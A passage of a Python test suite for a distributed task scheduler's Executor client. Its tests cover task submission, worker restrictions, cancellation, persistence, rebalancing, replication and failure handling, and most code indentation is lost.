x = e.submit(inc, 15, workers='127.0.0.3', allow_other_workers=True)
yield x._result()
assert s.who_has[x.key]
assert x.key in s.loose_restrictions
L = e.map(inc, range(15, 25), workers='127.0.0.3', allow_other_workers=True)
yield _wait(L)
assert all(s.who_has[f.key] for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
e.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
e.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
e.submit(inc, 20, workers='127.0.0.1', allow_other_workers='Hello!')
with pytest.raises(TypeError):
e.map(inc, [20], workers='127.0.0.1', allow_other_workers='Hello!')
@pytest.mark.skipif('True', reason='because')
def test_bad_address():
try:
Executor('123.123.123.123:1234', timeout=0.1)
except (IOError, gen.TimeoutError) as e:
assert "connect" in str(e).lower()
try:
Executor('127.0.0.1:1234', timeout=0.1)
except (IOError, gen.TimeoutError) as e:
assert "connect" in str(e).lower()
@gen_cluster(executor=True)
def test_long_error(e, s, a, b):
def bad(x):
raise ValueError('a' * 100000)
x = e.submit(bad, 10)
try:
yield x._result()
except ValueError as e:
assert len(str(e)) < 100000
tb = yield x._traceback()
assert all(len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str))
@gen_cluster(executor=True)
def test_map_on_futures_with_kwargs(e, s, a, b):
def f(x, y=10):
return x + y
futures = e.map(inc, range(10))
futures2 = e.map(f, futures, y=20)
results = yield e._gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = e.submit(inc, 100)
future2 = e.submit(f, future, y=200)
result = yield future2._result()
assert result == 100 + 1 + 200
@gen_cluster(Worker=Nanny, timeout=60, executor=True)
def test_failed_worker_without_warning(e, s, a, b):
L = e.map(inc, range(10))
yield _wait(L)
a.process.terminate()
start = time()
while not a.process.is_alive():
yield gen.sleep(0.01)
assert time() - start < 10
yield gen.sleep(0.5)
start = time()
while len(s.ncores) < 2:
yield gen.sleep(0.01)
assert time() - start < 10
yield _wait(L)
L2 = e.map(inc, range(10, 20))
yield _wait(L2)
assert all(len(keys) > 0 for keys in s.has_what.values())
ncores2 = s.ncores.copy()
yield e._restart()
L = e.map(inc, range(10))
yield _wait(L)
assert all(len(keys) > 0 for keys in s.has_what.values())
assert not (set(ncores2) & set(s.ncores)) # no overlap
class BadlySerializedObject(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(executor=True)
def test_badly_serialized_input(e, s, a, b):
o = BadlySerializedObject()
future = e.submit(inc, o)
futures = e.map(inc, range(10))
L = yield e._gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == 'error'
@pytest.mark.skipif('True', reason="")
def test_badly_serialized_input_stderr(capsys, loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
o = BadlySerializedObject()
future = e.submit(inc, o)
start = time()
while True:
sleep(0.01)
out, err = capsys.readouterr()
if 'hello!' in err:
break
assert time() - start < 20
assert future.status == 'error'
@gen_cluster(executor=True)
def test_repr(e, s, a, b):
assert s.ip in str(e)
assert str(s.port) in repr(e)
@gen_cluster(executor=True)
def test_forget_simple(e, s, a, b):
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
yield _wait([x, y, z])
assert not s.waiting_data[x.key]
assert not s.waiting_data[y.key]
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=e.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=e.id)
for coll in [s.tasks, s.dependencies, s.dependents, s.waiting,
s.waiting_data, s.who_has, s.restrictions, s.loose_restrictions,
s.released, s.keyorder, s.exceptions, s.who_wants,
s.exceptions_blame, s.nbytes]:
assert x.key not in coll
assert z.key not in coll
assert z.key not in s.dependents[y.key]
s.client_releases_keys(keys=[y.key], client=e.id)
assert not s.tasks
@gen_cluster(executor=True)
def test_forget_complex(e, s, A, B):
a, b, c, d = yield e._scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
yield _wait([a,b,c,d,ab,ac,cd,acab])
assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac,cd]}
assert b.key not in s.who_has
start = time()
while b.key in A.data or b.key in B.data:
yield gen.sleep(0.01)
assert time() < start + 10
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd]}
@gen_cluster(executor=True)
def test_forget_in_flight(e, s, A, B):
a, b, c, d = [delayed(slowinc)(i) for i in range(4)]
ab = delayed(slowadd)(a, b)
cd = delayed(slowadd)(c, d)
ac = delayed(slowadd)(a, c)
acab = delayed(slowadd)(ac, ab)
x, y = e.compute([ac, acab])
s.validate()
for i in range(5):
yield gen.sleep(0.01)
s.validate()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
assert k not in s.waiting
assert k not in s.who_has
@gen_cluster(executor=True)
def test_forget_errors(e, s, a, b):
x = e.submit(div, 1, 0)
y = e.submit(inc, x)
z = e.submit(inc, y)
yield _wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=e.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=e.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=e.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(loop):
with cluster(nworkers=3) as (s, [a, b, c]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
s = str(e)
r = repr(e)
assert e.scheduler.ip in s
assert str(e.scheduler.port) in r
assert str(3) in s # nworkers
assert 'cores' in s
@gen_cluster(executor=True)
def test_waiting_data(e, s, a, b):
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
yield _wait([x, y, z])
assert x.key not in s.waiting_data[x.key]
assert y.key not in s.waiting_data[y.key]
assert not s.waiting_data[x.key]
assert not s.waiting_data[y.key]
@gen_cluster()
def test_multi_executor(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
f = Executor((s.ip, s.port), start=False)
yield f._start()
assert set(s.streams) == {e.id, f.id}
x = e.submit(inc, 1)
y = f.submit(inc, 2)
y2 = e.submit(inc, 2)
assert y.key == y2.key
yield _wait([x, y])
assert s.wants_what == {e.id: {x.key, y.key}, f.id: {y.key}}
assert s.who_wants == {x.key: {e.id}, y.key: {e.id, f.id}}
yield e._shutdown()
start = time()
while e.id in s.wants_what:
yield gen.sleep(0.01)
assert time() < start + 5
assert e.id not in s.wants_what
assert e.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
yield f._shutdown()
assert not s.tasks
@gen_cluster(executor=True, timeout=60)
def test_broken_worker_during_computation(e, s, a, b):
n = Nanny(s.ip, s.port, ncores=2, loop=s.loop)
n.start(0)
start = time()
while len(s.ncores) < 3:
yield gen.sleep(0.01)
assert time() < start + 5
L = e.map(inc, range(256))
for i in range(8):
L = e.map(add, *zip(*partition_all(2, L)))
from random import random
yield gen.sleep(random() / 2)
n.process.terminate()
yield gen.sleep(random() / 2)
n.process.terminate()
result = yield e._gather(L)
assert isinstance(result[0], int)
yield n._close()
@gen_cluster()
def test_cleanup_after_broken_executor_connection(s, a, b):
def f(ip, port):
e = Executor((ip, port))
x = e.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
proc = Process(target=f, args=(s.ip, s.port))
proc.daemon = True
proc.start()
start = time()
while not s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
proc.terminate()
start = time()
while s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
@gen_cluster()
def test_multi_garbage_collection(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
f = Executor((s.ip, s.port), start=False)
yield f._start()
x = e.submit(inc, 1)
y = f.submit(inc, 2)
y2 = e.submit(inc, 2)
assert y.key == y2.key
yield _wait([x, y])
x.__del__()
start = time()
while x.key in a.data or x.key in b.data:
yield gen.sleep(0.01)
assert time() < start + 5
assert s.wants_what == {e.id: {y.key}, f.id: {y.key}}
assert s.who_wants == {y.key: {e.id, f.id}}
y.__del__()
start = time()
while x.key in s.wants_what[f.id]:
yield gen.sleep(0.01)
assert time() < start + 5
yield gen.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {e.id: {y.key}, f.id: set()}
assert s.who_wants == {y.key: {e.id}}
y2.__del__()
start = time()
while y.key in a.data or y.key in b.data:
yield gen.sleep(0.01)
assert time() < start + 5
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
yield e._shutdown()
yield f._shutdown()
@gen_cluster(executor=True)
def test__broadcast(e, s, a, b):
x, y = yield e._scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4)
def test__broadcast_integer(e, s, *workers):
x, y = yield e._scatter([1, 2], broadcast=2)
assert len(s.who_has[x.key]) == 2
assert len(s.who_has[y.key]) == 2
@gen_cluster(executor=True)
def test__broadcast_dict(e, s, a, b):
d = yield e._scatter({'x': 1}, broadcast=True)
assert a.data == b.data == {'x': 1}
def test_broadcast(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x, y = e.scatter([1, 2], broadcast=True)
has_what = sync(e.loop, e.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
'127.0.0.1:%d' % a['port']: {x.key, y.key},
'127.0.0.1:%d' % b['port']: {x.key, y.key}}
[z] = e.scatter([3], broadcast=True, workers=['127.0.0.1:%d' % a['port']])
has_what = sync(e.loop, e.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
'127.0.0.1:%d' % a['port']: {x.key, y.key, z.key},
'127.0.0.1:%d' % b['port']: {x.key, y.key}}
@gen_cluster(executor=True)
def test__cancel(e, s, a, b):
x = e.submit(slowinc, 1)
y = e.submit(slowinc, x)
while y.key not in s.tasks:
yield gen.sleep(0.01)
yield e._cancel([x])
assert x.cancelled()
assert 'cancel' in str(x)
s.validate()
start = time()
while not y.cancelled():
yield gen.sleep(0.01)
assert time() < start + 5
assert not s.tasks
assert not s.who_has
s.validate()
@gen_cluster()
def test__cancel_multi_client(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
f = Executor((s.ip, s.port), start=False)
yield f._start()
x = e.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
yield e._cancel([x])
assert x.cancelled()
assert not y.cancelled()
start = time()
while y.key not in s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
out = yield y._result()
assert out == 2
with pytest.raises(CancelledError):
yield x._result()
yield e._shutdown()
yield f._shutdown()
@gen_cluster(executor=True)
def test__cancel_collection(e, s, a, b):
import dask.bag as db
L = e.map(double, [[1], [2], [3]])
x = db.Bag({('b', i): f for i, f in enumerate(L)}, 'b', 3)
yield e._cancel(x)
yield e._cancel([x])
assert all(f.cancelled() for f in L)
assert not s.tasks
assert not s.who_has
def test_cancel(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(slowinc, 1)
y = e.submit(slowinc, x)
z = e.submit(slowinc, y)
e.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 5
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(executor=True)
def test_future_type(e, s, a, b):
x = e.submit(inc, 1)
yield _wait([x])
assert x.type == int
assert 'int' in str(x)
@gen_cluster(executor=True)
def test_traceback_clean(e, s, a, b):
x = e.submit(div, 1, 0)
try:
yield x._result()
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert 'scheduler' not in tb.tb_frame.f_code.co_filename
assert 'worker' not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(executor=True)
def test_map_queue(e, s, a, b):
from distributed.compatibility import Queue, isqueue
q_1 = Queue(maxsize=2)
q_2 = e.map(inc, q_1)
assert isqueue(q_2)
assert not q_2.maxsize
q_3 = e.map(double, q_2, maxsize=3)
assert isqueue(q_3)
assert q_3.maxsize == 3
q_4 = yield e._gather(q_3)
assert isqueue(q_4)
q_1.put(1)
f = q_4.get()
assert isinstance(f, Future)
result = yield f._result()
assert result == (1 + 1) * 2
@gen_cluster(executor=True)
def test_map_iterator_with_return(e, s, a, b):
def g():
yield 1
yield 2
raise StopIteration(3) # py2.7 compat.
f1 = e.map(lambda x: x, g())
assert isinstance(f1, Iterator)
start = time() # ensure that we compute eagerly
while not s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
g1 = g()
try:
while True:
f = next(f1)
n = yield f._result()
assert n == next(g1)
except StopIteration as e:
with pytest.raises(StopIteration) as exc_info:
next(g1)
assert e.args == exc_info.value.args
@gen_cluster(executor=True)
def test_map_iterator(e, s, a, b):
x = iter([1, 2, 3])
y = iter([10, 20, 30])
f1 = e.map(add, x, y)
assert isinstance(f1, Iterator)
start = time() # ensure that we compute eagerly
while not s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
f2 = e.map(double, f1)
assert isinstance(f2, Iterator)
future = next(f2)
result = yield future._result()
assert result == (1 + 10) * 2
futures = list(f2)
results = []
for f in futures:
r = yield f._result()
results.append(r)
assert results == [(2 + 20) * 2, (3 + 30) * 2]
items = enumerate(range(10))
futures = e.map(lambda x: x, items)
assert isinstance(futures, Iterator)
result = yield next(futures)._result()
assert result == (0, 0)
futures_l = list(futures)
results = []
for f in futures_l:
r = yield f._result()
results.append(r)
assert results == [(i, i) for i in range(1,10)]
@gen_cluster(executor=True)
def test_map_infinite_iterators(e, s, a, b):
futures = e.map(add, [1, 2], itertools.repeat(10))
assert len(futures) == 2
def test_map_iterator_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
items = enumerate(range(10))
futures = e.map(lambda x: x, items)
            assert next(futures).result() == (0, 0)
@gen_cluster(executor=True)
def test_map_different_lengths(e, s, a, b):
assert len(e.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
ensure_default_get(e)
ensure_default_get(e)
ensure_default_get(e)
ensure_default_get(e)
assert _globals['get'] == e.get
out, err = capsys.readouterr()
assert len(out.strip().split('\n')) == 1
assert _globals.get('get') != e.get
@gen_cluster(timeout=60, executor=True)
def test_async_persist(e, s, a, b):
from dask.imperative import delayed, Delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = e.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y._keys() == yy._keys()
assert w._keys() == ww._keys()
while y.key not in s.tasks and w.key not in s.tasks:
yield gen.sleep(0.01)
assert s.who_wants[y.key] == {e.id}
assert s.who_wants[w.key] == {e.id}
yyf, wwf = e.compute([yy, ww])
yyy, www = yield e._gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(e.persist(y), Delayed)
assert isinstance(e.persist([y]), (list, tuple))
@gen_cluster(executor=True)
def test__persist(e, s, a, b):
pytest.importorskip('dask.array')
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = e.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy._keys() == y._keys()
g, h = e.compute([y, yy])
gg, hh = yield e._gather([g, h])
assert (gg == hh).all()
def test_persist(loop):
pytest.importorskip('dask.array')
import dask.array as da
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = e.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy._keys() == y._keys()
assert (yy.compute(get=e.get) == y.compute(get=e.get)).all()
@gen_cluster(timeout=60, executor=True)
def test_long_traceback(e, s, a, b):
from distributed.core import dumps
n = sys.getrecursionlimit()
sys.setrecursionlimit(500)
try:
x = e.submit(deep, 1000)
yield _wait([x])
assert len(dumps(e.futures[x.key]['traceback'])) < 10000
assert isinstance(e.futures[x.key]['exception'], RuntimeError)
finally:
sys.setrecursionlimit(n)
@gen_cluster(executor=True)
def test_wait_on_collections(e, s, a, b):
import dask.bag as db
L = e.map(double, [[1], [2], [3]])
x = db.Bag({('b', i): f for i, f in enumerate(L)}, 'b', 3)
yield _wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(executor=True)
def test_futures_of(e, s, a, b):
x, y, z = e.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
import dask.bag as db
b = db.Bag({('b', i): f for i, f in enumerate([x, y, z])}, 'b', 3)
assert set(futures_of(b)) == {x, y, z}
@gen_cluster(executor=True)
def test_futures_of_cancelled_raises(e, s, a, b):
x = e.submit(inc, 1)
yield e._cancel([x])
with pytest.raises(CancelledError):
yield x._result()
with pytest.raises(CancelledError):
yield e._get({'x': (inc, x), 'y': (inc, 2)}, ['x', 'y'])
with pytest.raises(CancelledError):
e.submit(inc, x)
with pytest.raises(CancelledError):
e.submit(add, 1, y=x)
with pytest.raises(CancelledError):
e.map(add, [1], y=x)
assert 'y' not in s.tasks
@gen_cluster(ncores=[('127.0.0.1', 1)], executor=True)
def test_dont_delete_recomputed_results(e, s, w):
x = e.submit(inc, 1) # compute first time
yield _wait([x])
x.__del__() # trigger garbage collection
xx = e.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
yield gen.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
yield gen.sleep(0.01)
@gen_cluster(ncores=[], executor=True)
def test_fatally_serialized_input(e, s):
o = FatallySerializedObject()
future = e.submit(inc, o)
while not s.tasks:
yield gen.sleep(0.01)
@gen_cluster(executor=True)
def test_balance_tasks_by_stacks(e, s, a, b):
x = e.submit(inc, 1)
yield _wait(x)
y = e.submit(inc, 2)
yield _wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(executor=True)
def test_run(e, s, a, b):
results = yield e._run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = yield e._run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = yield e._run(inc, 1, workers=[])
assert results == {}
def test_run_sync(loop):
def func(x, y=10):
return x + y
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
result = e.run(func, 1, y=2)
assert result == {'127.0.0.1:%d' % a['port']: 3,
'127.0.0.1:%d' % b['port']: 3}
result = e.run(func, 1, y=2, workers=['127.0.0.1:%d' % a['port']])
assert result == {'127.0.0.1:%d' % a['port']: 3}
def test_run_exception(loop):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type) as excinfo:
e.run(raise_exception, exc_type, 'informative message')
assert 'informative message' in str(excinfo.value)
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = '127.0.0.1:%d' % a['port']
b_addr = '127.0.0.1:%d' % b['port']
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
d = e.ncores()
assert d == {a_addr: 1, b_addr: 1}
d = e.ncores([a_addr])
assert d == {a_addr: 1}
d = e.ncores(a_addr)
assert d == {a_addr: 1}
d = e.ncores(('127.0.0.1', a['port']))
assert d == {a_addr: 1}
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(inc, 3)
wait([x, y, z])
d = e.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = e.who_has([x, y])
assert set(d) == {x.key, y.key}
d = e.who_has(x)
assert set(d) == {x.key}
d = e.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = e.has_what([a_addr])
assert set(d) == {a_addr}
d = e.has_what(a_addr)
assert set(d) == {a_addr}
d = e.has_what(('127.0.0.1', a['port']))
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
incs = e.map(inc, [1, 2, 3])
doubles = e.map(double, [1, 2, 3])
wait(incs + doubles)
assert e.nbytes(summary=False) == {k.key: sizeof(1)
for k in incs + doubles}
assert e.nbytes(summary=True) == {'inc': sizeof(1) * 3,
'double': sizeof(1) * 3}
@gen_cluster(executor=True)
def test_diagnostic_nbytes(e, s, a, b):
incs = e.map(inc, [1, 2, 3])
doubles = e.map(double, [1, 2, 3])
yield _wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1)
for k in incs + doubles}
assert s.get_nbytes(summary=True) == {'inc': sizeof(1) * 3,
'double': sizeof(1) * 3}
@gen_test()
def test_worker_aliases():
s = Scheduler()
s.start(0)
a = Worker(s.ip, s.port, name='alice')
b = Worker(s.ip, s.port, name='bob')
yield [a._start(), b._start()]
e = Executor((s.ip, s.port), start=False)
yield e._start()
L = e.map(inc, range(10), workers='alice')
yield _wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
yield e._shutdown()
yield [a._close(), b._close()]
yield s.close()
def test_persist_get_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = e.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute(get=e.get) == ((1+1) + (2+2)) + 10
@gen_cluster(executor=True)
def test_persist_get(e, s, a, b):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = e.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
yield gen.sleep(0.5)
result = yield e._get(xxyy3.dask, xxyy3._keys())
assert result[0] == ((1+1) + (2+2)) + 10
result = yield e.compute(xxyy3)._result()
assert result == ((1+1) + (2+2)) + 10
result = yield e.compute(xxyy3)._result()
assert result == ((1+1) + (2+2)) + 10
result = yield e.compute(xxyy3)._result()
assert result == ((1+1) + (2+2)) + 10
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="num_fds not supported on windows")
def test_executor_num_fds(loop):
psutil = pytest.importorskip('psutil')
with cluster() as (s, [a, b]):
proc = psutil.Process()
before = proc.num_fds()
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
during = proc.num_fds()
after = proc.num_fds()
assert before >= after
@gen_cluster()
def test_startup_shutdown_startup(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
yield e._shutdown()
e = Executor((s.ip, s.port), start=False)
yield e._start()
yield e._shutdown()
def test_startup_shutdown_startup_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
pass
sleep(0.1)
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
pass
with Executor(('127.0.0.1', s['port'])) as e:
pass
sleep(0.1)
with Executor(('127.0.0.1', s['port'])) as e:
pass
@gen_cluster(executor=True)
def test_badly_serialized_exceptions(e, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException('hello world')
x = e.submit(f)
try:
result = yield x._result()
except Exception as e:
assert 'hello world' in str(e)
else:
assert False
@gen_cluster(executor=True)
def test_rebalance(e, s, a, b):
x, y = yield e._scatter([1, 2], workers=[a.address])
assert len(a.data) == 2
assert len(b.data) == 0
yield e._rebalance()
assert len(b.data) == 1
assert s.has_what[b.address] == set(b.data)
assert b.address in s.who_has[x.key] or b.address in s.who_has[y.key]
assert len(a.data) == 1
assert s.has_what[a.address] == set(a.data)
assert (a.address not in s.who_has[x.key] or
a.address not in s.who_has[y.key])
@gen_cluster(ncores=[('127.0.0.1', 1)] * 4, executor=True)
def test_rebalance_workers(e, s, a, b, c, d):
w, x, y, z = yield e._scatter([1, 2, 3, 4], workers=[a.address])
assert len(a.data) == 4
assert len(b.data) == 0
assert len(c.data) == 0
assert len(d.data) == 0
yield e._rebalance([x, y], workers=[a.address, c.address])
assert len(a.data) == 3
assert len(b.data) == 0
assert len(c.data) == 1
assert len(d.data) == 0
assert c.data == {x.key: 2} or c.data == {y.key: 3}
yield e._rebalance()
assert len(a.data) == 1
assert len(b.data) == 1
assert len(c.data) == 1
assert len(d.data) == 1
@gen_cluster(executor=True)
def test_rebalance_execution(e, s, a, b):
futures = e.map(inc, range(10), workers=a.address)
yield e._rebalance(futures)
assert len(a.data) == len(b.data) == 5
def test_rebalance_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
futures = e.map(inc, range(10), workers=[('127.0.0.1', a['port'])])
e.rebalance(futures)
has_what = e.has_what()
assert len(has_what) == 2
assert list(valmap(len, has_what).values()) == [5, 5]
@gen_cluster(executor=True)
def test_receive_lost_key(e, s, a, b):
x = e.submit(inc, 1, workers=[a.address])
result = yield x._result()
yield a._close()
start = time()
while x.status == 'finished':
assert time() < start + 5
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[])
def test_add_worker_after_tasks(e, s):
futures = e.map(inc, range(10))
n = Nanny(s.ip, s.port, ncores=2, loop=s.loop)
n.start(0)
result = yield e._gather(futures)
yield n._close()
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_workers_register_indirect_data(e, s, a, b):
[x] = yield e._scatter([1], workers=a.address)
y = e.submit(inc, x, workers=b.ip)
yield y._result()
assert b.data[x.key] == 1
assert s.who_has[x.key] == {a.address, b.address}
assert s.has_what[b.address] == {x.key, y.key}
s.validate()
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(executor=True, ncores=[('127.0.0.1', 2), ('127.0.0.2', 2)],
timeout=20)
def test_work_stealing(e, s, a, b):
[x] = yield e._scatter([1])
futures = e.map(slowadd, range(50), [x] * 50)
yield _wait(futures)
assert len(a.data) > 10
assert len(b.data) > 10
@gen_cluster(executor=True)
def test_submit_on_cancelled_future(e, s, a, b):
x = e.submit(inc, 1)
yield x._result()
yield e._cancel(x)
with pytest.raises(CancelledError):
y = e.submit(inc, x)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_replicate(e, s, *workers):
[a, b] = yield e._scatter([1, 2])
yield s.replicate(keys=[a.key, b.key], n=5)
assert len(s.who_has[a.key]) == 5
assert len(s.who_has[b.key]) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_replicate_workers(e, s, *workers):
[a, b] = yield e._scatter([1, 2], workers=[workers[0].address])
yield s.replicate(keys=[a.key, b.key], n=5,
workers=[w.address for w in workers[:5]])
assert len(s.who_has[a.key]) == 5
assert len(s.who_has[b.key]) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
yield s.replicate(keys=[a.key, b.key], n=1)
assert len(s.who_has[a.key]) == 1
assert len(s.who_has[b.key]) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate()
yield s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.who_has[a.key]) == 10
assert len(s.who_has[b.key]) == 10
s.validate()
yield s.replicate(keys=[a.key, b.key], n=1,
workers=[w.address for w in workers[:5]])
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
class CountSerialization(object):
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_replicate_tree_branching(e, s, *workers):
